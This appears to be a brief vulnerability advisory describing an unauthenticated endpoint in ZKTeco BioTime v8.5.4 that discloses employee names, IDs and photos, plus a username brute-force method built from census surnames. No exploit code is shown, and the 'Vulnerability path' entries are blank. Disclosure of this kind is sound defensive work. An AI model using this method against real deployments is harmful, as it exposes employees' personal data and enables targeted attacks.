An issue in ZKTeco BioTime v.8.5.4 allows a remote attacker to obtain sensitive information.
An attacker can perform a brute-force attack with common usernames, or may use census data of common last names and append each letter of the alphabet to generate valid username lists.
Vulnerability path:
ZKTeko BioTime v.8.5.4 contains an affected endpoint that discloses employees data (name, employment ID, photo, etc) which can be accessed without authentication and authorization checks.
An attacker might use the disclosed information to gain a greater understanding of the systems and the employees and potentially develop further attacks targeted at the organization e.g. the attacker might use the employees usernames and IDs to gain access to different employees-only systems. Also, The attacker can leak those information to the internet.
Vulnerability path: